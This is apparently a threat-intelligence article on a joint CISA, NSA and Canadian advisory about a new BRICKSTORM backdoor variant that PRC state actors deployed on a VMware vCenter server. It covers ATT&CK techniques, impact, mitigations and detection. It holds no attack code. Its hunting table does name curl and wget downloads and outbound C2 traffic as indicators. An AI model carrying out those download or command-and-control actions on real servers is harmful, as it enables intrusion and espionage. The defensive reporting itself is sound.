CISA, NSA, and Canada Warn of New BRICKSTORM Malware Variant Used by Chinese Hackers

US and Canadian Agencies Update Advisory on BRICKSTORM Backdoor Used by PRC State-Sponsored Actors

HIGH
February 11, 2026
6m read
MalwareThreat ActorThreat Intelligence

Related Entities

Threat Actors

People's Republic of China (PRC) state-sponsored actors

Products & Tech

VMware vCenter Server

Other

BRICKSTORM

MITRE ATT&CK Techniques

T1190Initial Access

Exploit Public-Facing Application

T1071.001Command and Control

Web Protocols

T1543.002Persistence

Create or Modify System Process: Systemd Service

T1021.004Lateral Movement

Remote Services: SSH

T1567Exfiltration

Exfiltration Over Web Service

Full Report

Executive Summary

On February 11, 2026, CISA, the NSA, and Canada's Cyber Centre (CCCS) issued a joint cybersecurity advisory (MAR-261234.c1.v1.CLEAR) detailing a new variant of the BRICKSTORM backdoor. This malware is attributed to state-sponsored threat actors from the People's Republic of China (PRC). The advisory is based on findings from an incident response investigation where the actors compromised a VMware vCenter Server to deploy the malware for long-term persistence. The update provides new indicators of compromise (IOCs) and detection rules to enable network defenders, particularly within government and critical infrastructure sectors, to hunt for and identify BRICKSTORM activity. The advisory underscores the persistent threat posed by PRC actors targeting critical enterprise management infrastructure.

Threat Overview

  • Threat Actor: People's Republic of China (PRC) state-sponsored actors.
  • Malware: BRICKSTORM, a custom backdoor designed for stealth and persistence.
  • Target: The advisory specifically calls out the compromise of a VMware vCenter Server, a high-value target that provides centralized management of virtualized infrastructure. Control over a vCenter server can grant an attacker sweeping access to an organization's entire server fleet.
  • Timeline: The advisory notes that in one confirmed incident, the threat actors gained initial access in April 2024 and remained persistent, with the new malware sample being the twelfth distinct version analyzed.
  • Objective: The primary goal of the BRICKSTORM malware is to establish and maintain long-term, covert access to victim networks for espionage or follow-on activities.

Technical Analysis

While the full technical details are in the official MAR, the context implies several key TTPs. The choice of a vCenter server as a host for the backdoor is strategically significant. These servers are often highly privileged, have extensive network access to ESXi hosts and virtual machines, and may not be monitored as rigorously as standard Windows servers.

By deploying BRICKSTORM on a vCenter appliance, the PRC actors can:

  1. Maintain Persistence: Survive reboots and system changes. This aligns with T1543.002 - Create or Modify System Process: Systemd Service if deployed on the Photon OS-based vCenter appliance.
  2. Evade Detection: Blend in with legitimate administrative traffic. The backdoor's C2 communication likely uses common web protocols like HTTPS to avoid suspicion, a hallmark of T1071.001 - Web Protocols.
  3. Enable Lateral Movement: From the vCenter server, attackers can easily move to any virtual machine in the environment, deploy additional tools, and access or exfiltrate vast amounts of data. This leverages the inherent trust and functionality of the vCenter platform.

The use of a twelfth variant indicates an active, ongoing development cycle, where the threat actors continuously modify their tools to evade signature-based detection, consistent with T1587.001 - Develop Capabilities: Malware.

MITRE ATT&CK Mapping

Impact Assessment

A compromise involving BRICKSTORM on a vCenter server is critical. It grants the attacker the 'keys to the kingdom' in a virtualized environment. The potential impact includes:

  • Widespread Data Exfiltration: Access to all data on all virtual machines managed by vCenter.
  • Ransomware Deployment: The ability to simultaneously deploy ransomware across hundreds or thousands of servers.
  • Infrastructure Sabotage: The power to delete or corrupt virtual machines, storage, and network configurations, causing catastrophic operational disruption.
  • Persistent Espionage: Long-term, undetected access to a network for intelligence gathering.

Given the targeting of government and critical infrastructure, the risk extends to national security.

Cyber Observables for Detection

While the MAR provides specific rules, security teams can proactively hunt for anomalous activity on vCenter servers:

Type Value Description Context
network_traffic_pattern Outbound connections from vCenter to non-VMware IPs vCenter servers should generally only communicate with ESXi hosts, domain controllers, and administrator workstations. Any other outbound traffic is highly suspicious. Firewall logs, NetFlow data
process_name vpxd, vsan-health Monitor for unusual child processes being spawned by core vCenter services. EDR on vCenter (if available), vCenter logs (/var/log/vmware/)
command_line_pattern curl *, wget * Any use of curl or wget on a vCenter appliance to download files from the internet is a major red flag. Audit logs, command-line logging (Sysmon for Linux)
file_path /tmp/, /var/tmp/ Threat actors often drop payloads in temporary directories. Monitor for new executable files in these locations on vCenter appliances. File integrity monitoring (FIM)

Detection & Response

  • Deploy Provided Signatures: Immediately import and enable the YARA and Sigma rules from MAR-261234.c1.v1.CLEAR in your SIEM, EDR, and threat hunting platforms.
  • Analyze vCenter Logs: Scrutinize vCenter server logs for unauthorized logins, configuration changes, or API access from unknown IP addresses. Forward these logs to a central SIEM for correlation.
  • Monitor Network Traffic: Implement network traffic analysis focused on your vCenter management network. Baseline normal traffic patterns and alert on any deviations, especially outbound connections to the internet.
  • D3FEND Techniques: Utilize D3-NTA: Network Traffic Analysis to detect anomalous C2 traffic from the vCenter server. Apply D3-SFA: System File Analysis by running the provided YARA rules against the vCenter filesystem.

Mitigation

  1. Harden vCenter Servers: Restrict access to the vCenter management interface to a dedicated and isolated management network. Do not expose it to the internet. Enforce MFA for all administrator accounts.
  2. Apply Principle of Least Privilege: Create granular roles and permissions within vCenter. Do not use a single, highly privileged account for all operations. This can limit an attacker's ability to move laterally even if they compromise an account.
  3. Network Segmentation: Isolate the vSphere/vCenter management network from the rest of the corporate and user networks. Strictly control and monitor all traffic entering and leaving this critical security zone.
  4. Regularly Audit vCenter: Perform regular audits of vCenter configurations, user accounts, and permissions. Look for unauthorized changes or dormant accounts that could be abused.

If any activity related to BRICKSTORM is detected, organizations are instructed to report the incident to CISA or their national CERT immediately.

Timeline of Events

1
April 1, 2024
PRC state-sponsored actors gained initial access to a victim network, later deploying BRICKSTORM.
2
February 11, 2026
CISA, NSA, and CCCS release an updated Malware Analysis Report on a new BRICKSTORM variant.
3
February 11, 2026
This article was published

MITRE ATT&CK Mitigations

Network Segmentation

M1030enterprise

Isolate the vCenter management network from general corporate and internet traffic to prevent initial access and contain post-compromise activity.

Mapped D3FEND Techniques:

D3-NI

Multi-factor Authentication

M1032enterprise

Enforce MFA on all vCenter administrator accounts to prevent unauthorized access even if credentials are compromised.

Mapped D3FEND Techniques:

D3-MFA

Audit

M1047enterprise

Enable and centralize logging for vCenter servers and monitor for anomalous activity, such as logins from unexpected locations or unusual API calls.

Mapped D3FEND Techniques:

D3-DAM

Update Software

M1051enterprise

Keep VMware vCenter Server and all related components fully patched to prevent exploitation of known vulnerabilities.

Mapped D3FEND Techniques:

D3-SU

D3FEND Defensive Countermeasures

Network Isolation

D3-NIMaps to MITREM1035
D3FEND

The compromise of a VMware vCenter Server, as seen with the BRICKSTORM malware, underscores the need for stringent network isolation. The vCenter management network, which includes the vCenter appliance and ESXi management interfaces (vmkernel ports), must be treated as a top-tier security zone. This network should be completely segregated from user, server, and internet-facing networks using VLANs and strict firewall access control lists (ACLs). All traffic to and from this management plane must be explicitly denied by default, with rules allowing only necessary communication, such as administrator access from a secure bastion host, DNS lookups to internal servers, and connections to domain controllers. Critically, all outbound internet access from the vCenter server must be blocked. This single control would have likely prevented the BRICKSTORM backdoor from establishing a connection to its external C2 server, rendering the malware inert.

Network Traffic Analysis

D3-NTAMaps to MITREM1031
D3FEND

To detect threats like BRICKSTORM, continuous network traffic analysis of the vCenter management network is essential. Deploy network sensors or leverage NetFlow/sFlow data from switches to build a baseline of normal vCenter communication patterns. Since vCenter traffic is typically predictable (e.g., communication with ESXi hosts on specific ports, AD/DNS traffic), any deviation is a strong indicator of compromise. Specifically, security teams should configure alerts for: 1) Any attempt by the vCenter server to initiate a connection to an external IP address. 2) Communication over non-standard ports or protocols. 3) Large, unexpected data transfers originating from the vCenter server. 4) Connections to known malicious domains or IP addresses using a threat intelligence feed. This proactive monitoring provides a high-fidelity detection mechanism for backdoors that need to communicate externally for command and control.

Sources & References

Malware Analysis Report: BRICKSTORM Backdoor
CISAFebruary 11, 2026
CISA Warns of New BRICKSTORM Malware Variant from Chinese Hackers
BleepingComputerFebruary 11, 2026

Article Author

Jason Gomes

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & AnalysisSecurity Orchestration (SOAR/XSOAR)Incident Response & Digital ForensicsSecurity Operations Center (SOC)SIEM & Security AnalyticsCyber Fusion & Threat SharingSecurity Automation & IntegrationManaged Detection & Response (MDR)
LinkedIn

Tags

BRICKSTORMMalwareBackdoorChinaAPTVMwarevCenterCISA

📢 Share This Article

Help others stay informed about cybersecurity threats